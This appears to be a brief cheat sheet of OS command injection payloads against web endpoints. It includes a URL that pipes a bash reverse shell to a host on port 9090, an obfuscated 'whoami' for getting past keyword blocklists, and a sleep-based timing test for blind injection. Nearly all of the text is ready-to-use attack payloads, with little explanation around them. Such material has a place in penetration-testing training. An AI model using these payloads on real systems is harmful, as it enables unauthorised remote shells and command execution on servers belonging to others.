Typical Input Normalization - Sending Clean Payloads
Original payload: this payload contains bad characters, so it must be URL-encoded (for example with Burp Suite) before it is sent.
http://example.com/nodejs/index.js?ip=127.0.0.1|bash -c 'bash -i >&/dev/tcp/192.168.x.x/9090 0>&1'
Typical Input Sanitization - Blocklisted Strings Bypass
Original payload that gets blocked
whoami
Obfuscated payload that gets executed ($() expands to an empty string, so the shell still sees whoami)
wh$()oami
Blind OS Command Injection Bypass
Measure the response time without an injected command
time curl "http://example.com/php/blind.php?ip=127.0.0.1"
Measure the response time with an injected command (sleep 20); a delay of roughly 20 seconds indicates the command ran
time curl "http://example.com/php/blind.php?ip=127.0.0.1;sleep%2020"